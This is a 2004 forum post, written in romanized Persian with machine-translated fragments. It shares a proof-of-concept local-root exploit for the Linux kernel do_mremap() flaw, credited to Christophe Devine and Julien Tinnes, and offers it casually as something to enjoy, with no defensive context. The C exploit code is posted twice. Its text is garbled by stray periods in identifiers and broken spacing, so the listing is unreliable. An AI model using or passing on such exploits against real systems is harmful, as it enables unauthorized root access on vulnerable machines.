NI3
01-06-2004, 05:33 PM
salam bache ha midonam deleton bara news tang shode !!!!! lol
inam ye chizi khob hal konid
----
6 January 2004
Linux kernel do_.mremap() proof-of-concept exploit code
Purpose of eksploita: Linux kernel 2.2, 2.4 and 2.6
Action of eksploita: Local root
Author of eksploita Christophe Devine and Julien Tinnes
Description of the vulnerability: [Only registered and activated users can see links]
To skachat' eksploit:
/ * * Proof-of-concept exploit code for do_.mremap() * *
Copyright (C) 2004 christophe Devine and Julien Tinnes * * This
program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License,
or * (at your option) any later version. * * This program is
distributed in the hope that it will be useful, * but WITHOUT ANY
WARRANTY; without even the implied warranty of * MERCHANTABILITY
or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General
Public License for more details. * * You should have received a
copy of the GNU General Public License * along with this program;
if not, write to the Free Software * Foundation, Inc., 59 temple
Place, Suite 330, Boston, MA 02111-1307 USA */
# include < asm/unistd.h>
# include < sys/mman.h >
# include < unistd.h >
# include < errno.h >
# define MREMAP_.MAYMOVE 1
# define MREMAP_.FIXED 2
# define __
NR_.real_.mremap __ NR_.mremap static inline _ syscall5(void *,
real_.mremap, void *, old_.address, size_.t, old_.size, size_.t,
new_.size, unsigned long, flags, void *, new_.address); int
main(void) {void * base; base = mmap(NULL, 8192, PROT_.READ |
PROT_.WRITE, MAP_.PRIVATE | MAP_.ANONYMOUS, 0, 0);
real_.mremap(base, 0, 0, MREMAP_.MAYMOVE | MREMAP_.FIXED, (void
*) 0xC0000000); fork(); return(0); }
inam ye chizi khob hal konid
----
6 January 2004
Linux kernel do_.mremap() proof-of-concept exploit code
Purpose of eksploita: Linux kernel 2.2, 2.4 and 2.6
Action of eksploita: Local root
Author of eksploita Christophe Devine and Julien Tinnes
Description of the vulnerability: [Only registered and activated users can see links]
To skachat' eksploit:
/ * * Proof-of-concept exploit code for do_.mremap() * *
Copyright (C) 2004 christophe Devine and Julien Tinnes * * This
program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License,
or * (at your option) any later version. * * This program is
distributed in the hope that it will be useful, * but WITHOUT ANY
WARRANTY; without even the implied warranty of * MERCHANTABILITY
or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General
Public License for more details. * * You should have received a
copy of the GNU General Public License * along with this program;
if not, write to the Free Software * Foundation, Inc., 59 temple
Place, Suite 330, Boston, MA 02111-1307 USA */
# include < asm/unistd.h>
# include < sys/mman.h >
# include < unistd.h >
# include < errno.h >
# define MREMAP_.MAYMOVE 1
# define MREMAP_.FIXED 2
# define __
NR_.real_.mremap __ NR_.mremap static inline _ syscall5(void *,
real_.mremap, void *, old_.address, size_.t, old_.size, size_.t,
new_.size, unsigned long, flags, void *, new_.address); int
main(void) {void * base; base = mmap(NULL, 8192, PROT_.READ |
PROT_.WRITE, MAP_.PRIVATE | MAP_.ANONYMOUS, 0, 0);
real_.mremap(base, 0, 0, MREMAP_.MAYMOVE | MREMAP_.FIXED, (void
*) 0xC0000000); fork(); return(0); }